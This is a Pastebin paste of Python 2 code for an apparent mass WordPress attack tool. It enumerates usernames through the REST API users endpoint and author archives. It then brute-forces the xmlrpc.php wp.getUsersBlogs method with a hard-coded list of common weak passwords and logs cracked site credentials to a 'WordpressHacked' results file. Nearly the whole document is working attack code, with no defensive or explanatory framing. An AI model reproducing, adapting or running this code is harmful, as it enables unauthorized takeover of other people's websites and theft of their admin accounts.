Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- def wordpress(site):
- try:
- usernameWp = UserName_Enumeration(site)
- if usernameWp == None:
- username = 'admin'
- else:
- username = usernameWp
- #print '[{}Wordpress]: {} {} ==> {}{} {}{} BruteForce {} User Found '.format(sb, sd, url,username, fc,fc, sb,fg)
- password = [username, username+"123", username+"12345", username, "pass", username+"@123", "demo", "admin123", "123456", "123456789", "123", "1234", "12345", "1234567", "12345678",
- "123456789", "admin1234", "admin123456", "pass123", "root", "321321", "123123", "112233", "102030",
- "password", "pass", "qwerty", "abc123", "654321", "pass1234", "abc1234", "demo1", "demo2",
- "demodemo", "url", "shop", "password123", "admin1", "admin12", "adminqwe", "test", "test123", "1",
- "12", "123123"]
- for passwd in password:
- # sess = requests.session()
- Headers = {
- 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0',
- 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
- 'Accept-Language': 'en-US,en;q=0.5',
- 'Accept-Encoding': 'gzip, deflate',
- 'Content-Type': 'application/x-www-form-urlencoded'
- }
- GoD = '<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>'+username+'</value></param><param><value>'+passwd+'</value></param></params></methodCall>'
- GoT = requests.post('http://'+site+"/xmlrpc.php" , data=GoD ,headers=Headers ,timeout=20)
- if 'isAdmin' in GoT.text:
- print '[{}Wordpress]: {} {} ==> {}@{} {}{} BruteForce {}{} Found '.format(sb, sd, site,username,passwd, fc,fc, sb,fg)
- open('Results/WordpressHacked.txt', 'a').write(site+'/wp-login.php' + '==>' + username + '@' + passwd + '\n')
- q.task_done()
- os._exit(1)
- else:
- print '[{}Wordpress]: {} {} ==> {}@{} {}{} BruteForce {}{} Failed '.format(sb, sd, site,username,passwd, fc,fc, sb,fr)
- except:
- pass
- def UserName_Enumeration(url):
- Headers = {
- 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0'
- }
- _cun = 1
- Flag = True
- __Check2 = requests.get('http://'+url + '/?author=1', timeout=10, headers=Headers)
- try:
- while Flag:
- GG = requests.get('http://'+url + '/wp-json/wp/v2/users/' + str(_cun),
- timeout=10, headers=Headers)
- __InFo = json.loads(GG.text)
- if 'id' not in __InFo:
- Flag = False
- else:
- Usernamez = __InFo['slug']
- return Usernamez
- break
- except:
- try:
- if '/author/' not in __Check2.text:
- return None
- else:
- find = re.findall('/author/(.*)/"', __Check2.text)
- username = find[0]
- if '/feed' in username:
- find = re.findall('/author/(.*)/feed/"', __Check2.text)
- username2 = find[0]
- return username2
- else:
- return username
- except requests.exceptions.ReadTimeout:
- return None
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement